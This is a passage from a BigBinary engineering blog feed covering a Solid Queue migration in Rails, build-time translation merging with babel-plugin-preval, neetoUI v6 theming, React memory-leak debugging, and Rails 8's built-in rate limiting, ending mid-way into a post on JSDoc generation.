Error handling and retries</h2><p>Initially, we thought the<a href="https://github.com/basecamp/solid_queue?tab=readme-ov-file#other-configuration-settings"><code>on_thread_error</code> configuration</a>provided by Solid Queue can be used for error handling. However, during thedevelopment phase, we noticed that it wasn't capturing errors. We raised<a href="https://github.com/basecamp/solid_queue/issues/120">an issue with Solid Queue</a>as we thought it was a bug.</p><p><a href="https://github.com/rosa">Rosa Gutirrez</a><a href="https://github.com/basecamp/solid_queue/issues/120#issuecomment-1894413948">responded</a>on the issue and clarified the following.</p><blockquote><p><code>on_thread_error</code> wasn't intended for errors on the job itself, but rathererrors in the thread that's executing the job, but around the job itself. Forexample, if you had an Active Record's thread pool too small for your numberof threads and you got an error when trying to check out a new connection,on_thread_error would be called with that.</p><p>For errors in the job itself, you could try to hook into Active Job's itself.</p></blockquote><p>Based on the above information, we modified our <code>SqBaseJob</code> base class to handlethe exceptions and report it to <a href="https://www.honeybadger.io/">Honeybadger</a>.</p><pre><code class="language-ruby"># sq_base_job.rbclass SqBaseJob &lt; ApplicationJob  self.queue_adapter = :solid_queue  rescue_from(Exception) do |exception|    context = {      error_class: self.class.name,      args: self.arguments,      scheduled_at: self.scheduled_at,      job_id: self.job_id    }    Honeybadger.notify(exception, context:)    raise exception  endend</code></pre><p>Remember we mentioned that <code>ActionMailer</code> doesn't inherit from <code>ApplicationJob</code>.So similarly, we would have to handle exceptions for Mailers separately.</p><pre><code class="language-ruby"># application_mailer.rbclass ApplicationMailer &lt; ActionMailer::Base  # ... 
  ActionMailer::MailDeliveryJob.rescue_from(Exception) do |exception|
    context = {
      error_class: self.class.name,
      args: self.arguments,
      scheduled_at: self.scheduled_at,
      job_id: self.job_id
    }
    Honeybadger.notify(exception, context:)
    raise exception
  end
end</code></pre><p>As for retries: unlike Sidekiq, Solid Queue doesn't include any automatic retry mechanism; it <a href="https://edgeguides.rubyonrails.org/active_job_basics.html#retrying-or-discarding-failed-jobs">relies on Active Job for this</a>. We wanted our application to retry sending emails in case of any errors, so we added the retry logic in the <code>ApplicationMailer</code>.</p><pre><code class="language-ruby"># application_mailer.rb
class ApplicationMailer &lt; ActionMailer::Base
  # ...
  ActionMailer::MailDeliveryJob.retry_on StandardError, attempts: 3
end</code></pre><p>Note that although the queue adapter configuration can be removed from <code>application_mailer.rb</code> once the entire application migrates to Solid Queue, the error handling and retry overrides cannot be removed, because <code>ActionMailer::MailDeliveryJob</code> inherits from <code>ActiveJob::Base</code> rather than the application's <code>ApplicationJob</code>.</p><h2>7. Testing</h2><p>Once all the above changes were done, it was obvious that a lot of tests were failing. Apart from fixing the usual failures related to the syntax changes, some of the tests were failing inconsistently. 
On debugging, we found that the affected tests were all related to controllers, specifically tests inheriting from <code>ActionDispatch::IntegrationTest</code>.</p><p>We tried debugging and searching for solutions when we stumbled upon <a href="https://github.com/bensheldon">Ben Sheldon's</a> <a href="https://github.com/bensheldon/good_job/issues/846#issuecomment-1432375562">comment on one of Good Job's issues</a>. Ben points out that this is actually <a href="https://github.com/rails/rails/issues/37270">an issue in Rails</a>, where Rails sometimes inconsistently overrides ActiveJob's queue_adapter setting with TestAdapter. A <a href="https://github.com/rails/rails/pull/48585">PR is already open</a> for the fix. Thankfully, Ben, in the same comment, also mentioned a workaround to use until the fix lands in Rails.</p><p>We added the workaround to our test <code>helper_methods.rb</code> and called the method in each of our failing controller tests.</p><pre><code class="language-ruby"># test/support/helper_methods.rb
def ensure_consistent_test_adapter_is_used
  # This is a hack mentioned here:
  # https://github.com/bensheldon/good_job/issues/846#issuecomment-1432375562
  # The actual issue is in Rails, for which a PR is pending merge:
  # https://github.com/rails/rails/pull/48585
  (ActiveJob::Base.descendants + [ActiveJob::Base]).each(&amp;:disable_test_adapter)
end</code></pre><pre><code class="language-ruby"># test/controllers/exports_controller_test.rb
class ExportsControllerTest &lt; ActionDispatch::IntegrationTest
  def setup
    ensure_consistent_test_adapter_is_used
    # ...
  end

  # ...
end</code></pre><h2>8. Monitoring</h2><p>Basecamp has released <a href="https://github.com/basecamp/mission_control-jobs">mission_control-jobs</a>, which can be used to monitor background jobs. 
It is generic, so it can be used with any compatible Active Job adapter.</p><p>Add <code>gem &quot;mission_control-jobs&quot;</code> to your Gemfile and run <code>bundle install</code>.</p><p>Mount the Mission Control route in your <code>routes.rb</code> file.</p><pre><code class="language-ruby"># routes.rb
Rails.application.routes.draw do
  # ...
  mount MissionControl::Jobs::Engine, at: &quot;/jobs&quot;
end</code></pre><p>By default, Mission Control tries to load the adapter specified in your <code>application.rb</code> or the individual environment-specific files. Currently, Sidekiq isn't compatible with Mission Control, so you will face an error while loading the dashboard at <code>/jobs</code>. The fix is to explicitly specify <code>solid_queue</code> in the list of Mission Control adapters.</p><pre><code class="language-ruby"># application.rb
# ...
config.mission_control.jobs.adapters = [:solid_queue]</code></pre><p>Now, visiting <code>/jobs</code> on your site should load a dashboard where you can monitor your Solid Queue jobs.</p><p>But that isn't enough: there is no authentication. That is fine for development environments, but the <code>/jobs</code> route would be exposed in production too. By default, Mission Control's controllers extend the host app's <code>ApplicationController</code>. If no authentication is enforced there, <code>/jobs</code> will be available to everyone.</p><p>To implement some kind of authentication, we can specify a different controller as the base class for Mission Control's controllers and add the authentication there.</p><pre><code class="language-ruby"># application.rb
# ...
MissionControl::Jobs.base_controller_class = &quot;MissionControlController&quot;</code></pre><pre><code class="language-ruby"># app/controllers/mission_control_controller.rb
class MissionControlController &lt; ApplicationController
  before_action :authenticate!, if: :restricted_env?

  private

    def authenticate!
      authenticate_or_request_with_http_basic do |username, password|
        username == &quot;solidqueue&quot; &amp;&amp; password == Rails.application.secrets.mission_control_password
      end
    end

    def restricted_env?
      Rails.env.staging? || Rails.env.production?
    end
end</code></pre><p>Here, we have specified that <code>MissionControlController</code> would be the base controller for Mission Control related controllers. Then, in <code>MissionControlController</code>, we implemented basic authentication for the staging and production environments.</p><h2>Observations</h2><p>We haven't had any complaints so far. Solid Queue offers simplicity, requires no additional infrastructure and provides visibility for managing jobs, since they are stored in the database.</p><p>In the coming days, we will migrate all of our 22 Neeto products to Solid Queue. And once cron-style job support lands in Solid Queue, we will completely migrate away from Sidekiq.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Streamlining translation resource loading in React apps with babel-plugin-preval]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/simplifying-loading-translation-resources-using-babel-plugin-preval"/>
      <updated>2024-02-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/simplifying-loading-translation-resources-using-babel-plugin-preval</id>
      <content type="html"><![CDATA[<p>At Neeto, our product development involves reusing common components, utilities, and initializers across various projects. To maintain a cohesive and standardized codebase, we've created specialized packages, or &quot;<code>nanos</code>&quot;, such as <code>neeto-commons-frontend</code>, <code>neeto-fields-nano</code>, and <code>neeto-team-members-nano</code>.</p><p><code>neeto-commons-frontend</code> houses utility functions, components, hooks, configuration settings, etc. <code>neeto-fields-nano</code> manages dynamic field components, while <code>neeto-team-members-nano</code> handles team member management functionalities.</p><p>These <code>nanos</code>, along with others, reduce redundancy and promote consistency across our products.</p><h2>Translation Challenges</h2><p>Many of our packages export components with text that requires internationalization, each maintaining its own translation files. We encountered an issue with the <code>withT</code> higher-order component (HOC) using <code>react-i18next</code> inside <code>neeto-commons-frontend</code>. Upon investigation, we found discrepancies in how packages handled dependencies.</p><p><code>withT</code> is an HOC which provides the <code>t</code> function from <code>react-i18next</code> to the wrapped component as a prop.</p><pre><code class="language-js">import { withTranslation } from &quot;react-i18next&quot;;

const withT = (Component, options, namespace = undefined) =&gt;
  withTranslation(namespace, options)(Component);

export default withT;</code></pre><pre><code class="language-jsx">// Example usage of withT:
const ComponentWithTranslation = withT(({ t }) =&gt; &lt;div&gt;{t(&quot;some.key&quot;)}&lt;/div&gt;);</code></pre><p>Let us first understand the difference between <code>dependencies</code> and <code>peerDependencies</code>. <code>dependencies</code> are external packages a library relies on, automatically installed with the library. 
<code>peerDependencies</code> indicate that users should explicitly install these dependencies in their application if they want to use the library. If they are not installed, warnings are shown during installation of the library, prompting us to install the peer dependencies.</p><p><code>react-i18next</code> and <code>i18next</code> were listed as <code>peerDependencies</code> in <code>neeto-commons-frontend</code>'s <code>package.json</code>. So it uses the instances of these libraries from the host application.</p><p>Examining <code>neeto-fields-nano</code>, we found that it listed <code>react-i18next</code> and <code>i18next</code> as <code>dependencies</code> rather than <code>peerDependencies</code>. This meant it had its own instances of these libraries, leading to initialization discrepancies.</p><p>In contrast, <code>neeto-team-members-frontend</code> listed <code>react-i18next</code> and <code>i18next</code> as <code>peerDependencies</code>, relying on the host application's initialization of these libraries.</p><p>The initialization logic, which is common among all the products, is placed inside <code>neeto-commons-frontend</code>. 
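</p><p>To make the two dependency styles above concrete, here is a sketch of how they could be declared side by side in a nano's <code>package.json</code>. The package name and version ranges are illustrative, not the actual ones used in our packages:</p>

```js
{
  "name": "@bigbinary/example-nano",
  // Bundled with the package: the nano carries its own copy,
  // and therefore its own instance, of the library.
  "dependencies": {
    "ramda": "^0.29.0"
  },
  // Expected from the host application: the nano shares the host's
  // single instance, so initialization happens exactly once.
  "peerDependencies": {
    "i18next": ">= 21.0.0",
    "react-i18next": ">= 11.0.0"
  }
}
```

<p>Note that JSON itself does not permit comments; they are included above only to annotate the sketch.</p><p>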
To ensure translations from all packages, including <code>neeto-commons-frontend</code>, are merged with those of the host application, we crafted a custom <code>initializeI18n</code> function:</p><pre><code class="language-js">import DOMPurify from &quot;dompurify&quot;;
import i18n from &quot;i18next&quot;;
import { curry, mergeAll, mergeDeepLeft } from &quot;ramda&quot;;
import { initReactI18next } from &quot;react-i18next&quot;;

import commonsEn from &quot;../translations/en.json&quot;;

const packageNames = [
  &quot;neeto-molecules&quot;,
  &quot;neeto-integrations-frontend&quot;,
  &quot;neeto-team-members-frontend&quot;,
  &quot;neeto-tags-frontend&quot;,
];

const getPackageTranslations = (language, packageNames) =&gt; {
  const loadTranslations = curry((language, packageName) =&gt; {
    try {
      return require(`../${packageName}/src/translations/${language}.json`);
    } catch {
      return {};
    }
  });

  const allTranslations = packageNames.map(loadTranslations(language));

  return mergeAll(allTranslations);
};

const packageEnTranslations = getPackageTranslations(&quot;en&quot;, packageNames);
const en = mergeDeepLeft(commonsEn, packageEnTranslations);

const initializeI18n = resources =&gt; {
  i18n.use(initReactI18next).init({
    resources: mergeDeepLeft(resources, { en: { translation: en } }),
    lng: &quot;en&quot;,
    fallbackLng: &quot;en&quot;,
    interpolation: { escapeValue: false, skipOnVariables: false },
  });
};

export default initializeI18n;</code></pre><p>Here, we loop through all the packages mentioned in <code>packageNames</code> and merge their translation keys with those inside <code>neeto-commons-frontend</code>; the translation keys from the host app are passed as an argument to the <code>initializeI18n</code> function.</p><p>While this approach successfully merges translations, it introduced complexity. As our project expanded with the inclusion of more packages, we found the need to regularly update the <code>neeto-commons-frontend</code> code, manually 
adding new packages to the <code>packageNames</code> array. This prompted us to seek an automated solution to streamline this process.</p><p>Given that all our packages are under the <code>@bigbinary</code> namespace in <code>npm</code>, we explored the possibility of handling this dynamically. An initial thought was to iterate through the packages under <code>node_modules/@bigbinary</code> and merge their translation keys. However, executing this in the browser was not possible, since the browser does not have access to its build environment's file system.</p><h2>Enter babel-plugin-preval:</h2><p>To automate our translation aggregation process, we turned to <a href="https://www.npmjs.com/package/babel-plugin-preval"><code>babel-plugin-preval</code></a>. This plugin allows us to execute dynamic tasks during build time.</p><p><code>babel-plugin-preval</code> lets us write code that runs in <code>Node</code> at build time; whatever we <code>module.exports</code> in there is swapped into the bundle.</p><p>Let us look at an example:</p><pre><code class="language-js">const x = preval`module.exports = 1`;</code></pre><p>will be transpiled to:</p><pre><code class="language-js">const x = 1;</code></pre><p>With <code>preval.require</code>, the following code:</p><pre><code class="language-js">const fileLastModifiedDate = preval.require(&quot;./get-last-modified-date&quot;);</code></pre><p>will be transpiled to:</p><pre><code class="language-js">const fileLastModifiedDate = &quot;2018-07-05&quot;;</code></pre><p>Here is the content of <code>get-last-modified-date.js</code>:</p><pre><code class="language-js">module.exports = &quot;2018-07-05&quot;;</code></pre><p>Here, the <code>2018-07-05</code> date is read from the file and inlined in the code.</p><p>In order to use this plugin, we just need to install it and add <code>preval</code> to the <code>plugins</code> array in <code>.babelrc</code> or <code>babel.config.js</code>.</p><h2>Streamlining Translations with preval:</h2><p>We revamped the 
<code>initializeI18n</code> function using <code>preval.require</code> to dynamically fetch translations from all <code>@bigbinary</code>-namespaced packages. This eliminated the need for manual updates in <code>neeto-commons-frontend</code> whenever a new package was added.</p><p>With preval, our <code>initializeI18n</code> function was refactored as follows:</p><pre><code class="language-js">const initializeI18n = hostTranslations =&gt; {
  // eslint-disable-next-line no-undef
  const packageTranslations = preval.require(
    &quot;../configs/scripts/getPkgTranslations.js&quot;
  );
  const commonsTranslations = { en: { translation: commonsEn } };

  const resources = [
    hostTranslations,
    commonsTranslations,
    packageTranslations,
  ].reduce(mergeDeepLeft);

  // Initialize i18next with the merged resources, as before.
  i18n.use(initReactI18next).init({
    resources,
    lng: &quot;en&quot;,
    fallbackLng: &quot;en&quot;,
    interpolation: { escapeValue: false, skipOnVariables: false },
  });
};</code></pre><p>The code for <code>getPkgTranslations.js</code>:</p><pre><code class="language-js">const fs = require(&quot;fs&quot;);
const path = require(&quot;path&quot;);
const { mergeDeepLeft } = require(&quot;ramda&quot;);

const packageDir = path.join(__dirname, &quot;../../&quot;);

const getPkgTransPath = pkg =&gt; {
  const basePath = path.join(packageDir, pkg);
  const transPath1 = path.join(basePath, &quot;app/javascript/src/translations&quot;);
  const transPath2 = path.join(basePath, &quot;src/translations&quot;);

  return fs.existsSync(transPath1) ? 
transPath1 : transPath2;
};

const packages = fs.readdirSync(packageDir);

const loadTranslations = translationsDir =&gt; {
  try {
    const jsonFiles = fs
      .readdirSync(translationsDir)
      .filter(file =&gt; file.endsWith(&quot;.json&quot;))
      .map(file =&gt; path.join(translationsDir, file));

    const translations = {};
    jsonFiles.forEach(jsonFile =&gt; {
      const content = fs.readFileSync(jsonFile, &quot;utf8&quot;);
      const basename = path.basename(jsonFile, &quot;.json&quot;);
      translations[basename] = { translation: JSON.parse(content) };
    });

    return translations;
  } catch {
    return {};
  }
};

const packageTranslations = packages
  .map(pkg =&gt; loadTranslations(getPkgTransPath(pkg)))
  .reduce(mergeDeepLeft);

module.exports = packageTranslations;</code></pre><p>In this workflow, we iterate through all the packages to retrieve their translation files and subsequently merge them. We are able to access the translation files of our packages since we have exposed those files in the <code>package.json</code> of all our packages.</p><p>The <code>files</code> property in <code>package.json</code> is an allowlist of the files that should be included in an <code>npm</code> release.</p><p>Inside the <code>package.json</code> of our nanos, we have added the translations folder to the <code>files</code> property:</p><pre><code class="language-js">{
  // other properties
  &quot;files&quot;: [&quot;app/javascript/src/translations&quot;]
}</code></pre><p>It's worth noting that we won't run <code>preval</code> at the time of bundling <code>neeto-commons-frontend</code>. Our objective is to merge the translation keys of all installed dependencies of the host project with those of the host project itself. 
Since <code>neeto-commons-frontend</code> is itself one of the dependencies of the host projects, executing preval within <code>neeto-commons-frontend</code> is not what we needed.</p><p>Consequently, we've manually excluded the <code>preval</code> plugin from the Babel configuration specific to <code>neeto-commons-frontend</code>:</p><pre><code class="language-js">module.exports = function (api) {
  const config = defaultConfigurations(api);
  config.plugins = config.plugins.filter(plugin =&gt; plugin !== &quot;preval&quot;);
  config.sourceMaps = true;

  return config;
};</code></pre><p>With this change, the Babel compiler simply skips the <code>preval</code> code during build time, and the <code>preval</code>-related code is kept as-is after compilation of <code>neeto-commons-frontend</code>.</p><p>Another challenge arises from the default behavior of <code>webpack</code>, which does not transpile the <code>node_modules</code> folder. However, it's necessary for our host application to perform this transpilation. To address this, we wrote a custom rule for <code>webpack</code>. 
The webpack rules are also placed in <code>neeto-commons-frontend</code> and shared across all the products.</p><pre><code class="language-js">{
  test: /\.js$/,
  include:
    /node_modules\/@bigbinary\/neeto-commons-frontend\/initializers\/i18n/,
  use: { loader: &quot;babel-loader&quot;, options: { plugins: [&quot;preval&quot;] } },
},</code></pre><p>This configuration ensures that Babel applies the necessary transformations to the code located in <code>node_modules/@bigbinary/neeto-commons-frontend/initializers/i18n/</code> within the host application.</p><p>Upon transpilation, our system consolidates all translations from each package, including those from the <code>neeto-commons-frontend</code> package, and incorporates them into the host application.</p><p>To mitigate potential conflicts arising from overlapping keys, we've implemented a namespacing strategy for translations originating from the various packages. This ensures that translations from our packages carry a distinctive key, uniquely identifying their source.</p><p>For example, consider the <code>neeto-filters-nano</code> package. In its English translation file (<code>en.json</code>), the translations are organized within a dedicated namespace:</p><pre><code class="language-json">{
  &quot;neetoFilters&quot;: {
    &quot;common&quot;: {}
  }
}</code></pre><h2>Conclusion:</h2><p>Leveraging <code>babel-plugin-preval</code> significantly simplified our translation resource loading process. The automation not only streamlined our workflow but also ensured that our applications stay consistent and easily adaptable to future package additions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introducing neetoUI v6]]></title>
       <author><name>Goutham Subramanyam</name></author>
      <link href="https://www.bigbinary.com/blog/introducing-neeto-ui-v6"/>
      <updated>2024-02-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/introducing-neeto-ui-v6</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p><a href="https://neeto-ui.neeto.com/">NeetoUI</a> is an open-source React component library developed for <a href="https://www.neeto.com/">neeto</a>. It makes it easier to build accessible and consistent UI in React applications. It is currently being used in more than 20 Neeto products. In this blog post, we will explore the exciting new features and enhancements of neetoUI.</p><h3>The Spark</h3><p>Though we were using neetoUI across all our products, we had to avoid neetoUI in certain products that followed a different UI style. For example, <a href="https://neetocode.com/">NeetoCode</a>, a coding platform built by BigBinary, has its own special design that is drastically different from the established neetoUI style. So, while building the new landing page for NeetoCode, we also had to create custom buttons and form elements that followed the NeetoCode design.</p><p>Secondly, neetoUI only supported theme overrides. This means the users could easily override the color scheme of neetoUI just by replacing the color variables. But with NeetoCode, just updating the theme was not enough. From button sizing to border radius and variants, every component was different in the NeetoCode design system. That's when we realized that neetoUI requires even more customization options to improve its adaptability.</p><h3>The Solution</h3><p>To enhance the customizability of neetoUI, we planned to implement a set of customization features similar to popular design systems like <a href="https://getbootstrap.com/docs/5.3/customize/overview/">Bootstrap</a> and <a href="https://ant.design/docs/react/customize-theme">Ant Design</a>. These features would allow users to adapt the library to their unique design without compromising on the core advantages of using neetoUI. 
Apart from the color theming, which neetoUI already supported, we also wanted to introduce component styling and responsive typography to further advance the customizability of neetoUI.</p><h3>The Execution</h3><p>NeetoUI has more than 30 components, and enhancing their customizability was not an easy task. We approached each component one by one and refactored the respective styles to use CSS variables for all the properties.</p><p>Let's take the example of the <code>Button</code> component from neetoUI. Earlier, we could only customize the colors used in the buttons. But with v6, we have made every aspect of the button, like padding, border radius, font size, etc., customizable.</p><p>Here is the list of variables used by the <code>Button</code> component.</p><p><strong>CSS</strong></p><pre><code class="language-css">--neeto-ui-btn-padding-x: 8px;
--neeto-ui-btn-padding-y: 6px;
--neeto-ui-btn-font-size: var(--neeto-ui-text-sm);
--neeto-ui-btn-font-weight: var(--neeto-ui-font-medium);
--neeto-ui-btn-line-height: 16px;
--neeto-ui-btn-color: rgb(var(--neeto-ui-black));
--neeto-ui-btn-bg-color: transparent;
--neeto-ui-btn-border-width: 0;
--neeto-ui-btn-border-color: transparent;
--neeto-ui-btn-border-radius: var(--neeto-ui-rounded);
--neeto-ui-btn-gap: 4px;
--neeto-ui-btn-icon-size: 16px;
--neeto-ui-btn-box-shadow: none;
--neeto-ui-btn-outline: none;

// Disabled
--neeto-ui-btn-disabled-opacity: 0.5;

// Hover
--neeto-ui-btn-hover-color: rgb(var(--neeto-ui-black));
--neeto-ui-btn-hover-bg-color: transparent;
--neeto-ui-btn-hover-box-shadow: none;
--neeto-ui-btn-hover-opacity: 1;

// Focus
--neeto-ui-btn-focus-color: rgb(var(--neeto-ui-black));
--neeto-ui-btn-focus-box-shadow: none;
--neeto-ui-btn-focus-opacity: 1;

// Focus Visible
--neeto-ui-btn-focus-visible-color: rgb(var(--neeto-ui-black));
--neeto-ui-btn-focus-visible-outline: 3px solid rgba(var(--neeto-ui-primary-500), 50%);
--neeto-ui-btn-focus-visible-outline-offset: 1px;
--neeto-ui-btn-focus-visible-box-shadow: 
none;</code></pre><p>The users can now tweak each property of the Button component using these variables and create their own version of the component. You can see it in action <a href="https://n53f9m.csb.app/">here</a>.</p><p><img src="/blog_images/2024/introducing-neeto-ui-v6/button-customization-example.png" alt="Button customization examples"></p><p><a href="https://codesandbox.io/embed/n53f9m?view=Editor+%2B+Preview&amp;module=%2Fsrc%2Fstyles.scss&amp;hidenavigation=1"><img src="https://codesandbox.io/static/img/play-codesandbox.svg" alt="Edit in CodeSandbox"></a></p><p>Likewise, we have updated all the components, and the new <a href="https://neeto-ui.neeto.com/">neetoUI storybook</a> has examples of how to override each component.</p><h3>The Result</h3><p>With all the customization improvements, neetoUI v6 has been released to the public. Just by changing a few CSS variables, you can now change the look and feel of neetoUI at both the global and component levels to match your exact design requirements.</p><p><img src="/blog_images/2024/introducing-neeto-ui-v6/neeto-ui-v6-customization.gif" alt="neetoUI v6 customization"></p><p>Do visit this <a href="https://mlxvmt.csb.app/">page</a> to understand the nuances of neetoUI v6 up close.</p><p>We hope you have a clearer understanding of the improvements we have made to the library. Do try it out and let us know your feedback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging memory issues in ReactJS applications]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-memory-issues-in-react-applications"/>
      <updated>2024-02-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-memory-issues-in-react-applications</id>
      <content type="html"><![CDATA[<p>Memory leaks can occur when resources allocated for a particular task have not been released after the task is finished. This leads to the accumulation of memory until applications do not have enough for the required tasks. In React, memory leaks can occur due to a multitude of reasons.</p><ul><li>Components are not unmounted properly.</li><li>Event listeners are not cleared after use.</li><li>Unnecessary data is stored in the state, or the state is not reset.</li></ul><p>This video shows how we can use the memory tab in Chrome Developer Tools to test our application for memory leaks.</p><p><em>The following video was made for internal use at BigBinary. The video is being presented &quot;as it was recorded&quot;.</em></p><p>&lt;iframe width=&quot;966&quot; height=&quot;604&quot; src=&quot;https://www.youtube.com/embed/pdJDIySfyLM&quot; title=&quot;Debugging NeetoTestify's memory leak&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 8 introduces a built-in rate limiting API]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-rate-limiting-api"/>
      <updated>2024-02-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-rate-limiting-api</id>
      <content type="html"><![CDATA[<p>In the dynamic world of web development, managing the flow of requests is crucial for maintaining a responsive and reliable application. Rate limiting is a powerful technique that acts as the traffic cop for your API, ensuring fair access to resources and preventing potential chaos. In a nutshell, rate limiting is the practice of controlling the rate of requests a user, device, or application can make within a set timeframe.</p><p>In this blog post, we'll delve into the concept of rate limiting, exploring its significance and implementation in Rails 8.0.</p><h2>The Need for Rate Limiting</h2><p>It's crucial in ensuring the following:</p><ul><li>Security Shield: Guards against Denial-of-Service (DoS) attacks, thwarting malicious attempts to flood your app and crash it.</li><li>Resource Balance: Prevents resource abuse by capping heavy users, ensuring fair resource distribution and maintaining optimal app performance.</li><li>Brute-Force Defender: Stalls hackers attempting password guesses or exploiting vulnerabilities through relentless, repeated attempts.</li></ul><h2>How Rack::Attack Paved the Way</h2><p>In the pre-Rails 8.0 era, the go-to solution for rate limiting was the <a href="https://github.com/rack/rack-attack"><code>rack-attack</code></a> gem. This gem allowed developers to set up rate-limiting rules by adding custom code in the <code>rack_attack.rb</code> file. While effective, this approach required manual intervention for each endpoint and could become cumbersome in a growing application. This external dependency brought its own set of challenges, such as the need for custom code and constant vigilance over rate-limited endpoints.</p><h2>Rails 8.0: Native Rate Limiting</h2><p>Rails 8.0 brings a native rate-limiting feature to the Action Controller, streamlining the process and eliminating the need for external gems. 
Developers can now set rate limits directly within their controllers using the <code>rate_limit</code> method.</p><p>Let's take a look at the usage:</p><h3>Define Limits</h3><p>Utilize the <code>rate_limit</code> method within your controllers, specifying the maximum allowed requests and the corresponding timeframe. The <code>rate_limit</code> method accepts the following parameters:</p><ul><li><code>to</code>: The maximum number of requests allowed; once exceeded, further requests are rejected with a <strong>429 Too Many Requests</strong> response.</li><li><code>within</code>: The time window within which the <code>to</code> limit applies.</li><li><code>only</code>: The controller actions that should be rate limited.</li><li><code>except</code>: The controller actions to be excluded from rate limiting.</li></ul><p>An example:</p><pre><code class="language-rb">class SignupController &lt; ApplicationController
  rate_limit to: 4, within: 1.minute, only: :create

  def create
    # ...
  end
end</code></pre><h3>Granular Control</h3><p>Target specific actions or employ custom logic for nuanced control. For instance, you can limit requests based on domain instead of IP address.</p><pre><code class="language-rb">rate_limit to: 4, within: 1.minute, by: -&gt; { request.domain }, only: :create</code></pre><h3>Tailored Responses</h3><p>By default, rate-limited requests receive a <code>429 Too Many Requests</code> error. However, you can personalize the response for a more informative user experience.</p><pre><code class="language-rb">rate_limit to: 4, within: 1.minute, with: -&gt; { redirect_to(ip_restrictions_controller_url, alert: &quot;Signup attempts failed four times. Please try again later.&quot;) }, only: :create</code></pre><h2>Custom Cache Stores</h2><p>The Rails 8.0 rate-limiting implementation at the moment allows us to make use of a wide range of backends as its store.</p><p>It includes:</p><ul><li>Memcached (via clients like Dalli)</li><li>Redis</li><li>Database-backed stores</li><li>File-based stores</li></ul><p>The Rate Limiting API seamlessly integrates with Rails' caching mechanisms, leveraging <a href="https://api.rubyonrails.org/classes/ActiveSupport/Cache.html"><code>ActiveSupport::Cache</code></a> stores. Developers can specify custom cache stores if they require separate handling for rate limits compared to other cache data. This integration ensures efficient storage and retrieval of rate limit data, optimizing performance. An example:</p><pre><code class="language-rb">class SignupController &lt; ApplicationController
  RATE_LIMIT_STORE = ActiveSupport::Cache::RedisCacheStore.new(url: ENV[&quot;REDIS_URL&quot;])

  rate_limit to: 8, within: 2.minutes, store: RATE_LIMIT_STORE
end</code></pre><h2>What to look forward to</h2><p>At the moment, the built-in rate limiting feature is limited in its extensibility. There are cases where this feature cannot be used as a direct replacement for logic that's based on the <code>rack-attack</code> gem. A good example is a scenario where we might want to use an exponential backoff based rate limiting algorithm, which can be implemented using the <code>rack-attack</code> gem but not with the built-in Rails feature at the moment.</p><p>Right now, we are constrained to stick to the default cache counter algorithm that Rails ships with. In the future, we can expect a more generic limiter interface, allowing users to explore advanced rate-limiting algorithms such as exponential backoff, leaky bucket, or token bucket. 
This change would openthe door for developers to swap the implementation based on their specificrequirements.</p><p>Please check out the following pull requests for more details:</p><ul><li>https://github.com/rails/rails/pull/50490</li><li>https://github.com/rails/rails/pull/50781</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Embracing Type Definitions and JSDoc Comments in JS packages]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/jsdoc-generation"/>
      <updated>2024-02-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jsdoc-generation</id>
<content type="html"><![CDATA[<p>At BigBinary, we decided to experiment with type definitions and JSDoc comments to see if using these tools improves how we interact with JavaScript packages.</p><h2>Why Type Definitions</h2><p>We considered using TypeScript. However, in the end, we opted against it since most of our clients use plain JavaScript. Still, we added type definitions for our JavaScript packages to:</p><ul><li><strong>Reduce Ambiguity and Improve Clarity</strong>: Type definitions shed light on the expected input and output of functions and components, eliminating ambiguity and allowing developers to understand the code without constantly referring to separate documentation.</li><li><strong>Enhance Productivity and Efficiency</strong>: By providing clear insights into the structure of our libraries, including information about arguments, props, and data types, type definitions significantly boost developer productivity and facilitate efficient coding practices.</li><li><strong>Seamless Code Editor Integration</strong>: Popular editors like VSCode leverage type definitions to offer powerful features like <a href="https://code.visualstudio.com/docs/editor/intellisense">IntelliSense</a>, further streamlining the development process and minimizing errors.</li></ul><h2>Unifying Documentation with JSDoc Comments</h2><p>Although type definitions offered a valuable structural understanding, comprehensive documentation remained a challenge. Here is a typical example of our documentation of an exported function inside a Markdown file:</p><p><img src="/blog_images/2024/jsdoc-generation/documentation.png" alt="Documentation"></p><p>Navigating between code and Markdown files scattered across the package repository was cumbersome and time-consuming.</p><p>To address this pain point, we incorporated JSDoc comments alongside type definitions. This allowed us to:</p><ul><li><strong>Consolidate Essential Documentation</strong>: Instead of relying on separate files, we embedded detailed usage instructions, examples, and additional information directly within the JSDoc comments, providing developers with readily available context within their IDE environment.</li><li><strong>Improve Accessibility and Transparency</strong>: By integrating documentation with the code itself, JSDoc comments eliminate the need for context switching and offer immediate access to critical information, enhancing developer understanding and decision-making.</li></ul><h2>Optimizing Documentation Workflow</h2><p>Maintaining two separate documentation sets, Markdown files and JSDoc comments, proved inefficient. To ensure consistency and eliminate redundancy, we automated the generation of JSDoc comments from the existing Markdown documentation.</p><p>This involved:</p><ul><li><strong>Standardization for Efficiency</strong>: We implemented a standardized structure and format for the Markdown documentation, facilitating easier reading for developers as well as easier parsing for an automated parser.</li><li><strong>Building a Custom Script</strong>: A dedicated script was developed to parse the Markdown files, extract the relevant documentation for each function or component, and automatically prepend it to the corresponding type definitions.</li><li><strong>Integration with Build Process</strong>: To ensure automatic updates and maintain a single source of truth, we integrated the JSDoc generation script into the package build process, seamlessly generating up-to-date documentation alongside the code itself.</li></ul><p>The snippet below shows a minimized version of the JSDoc generation script:</p><pre><code 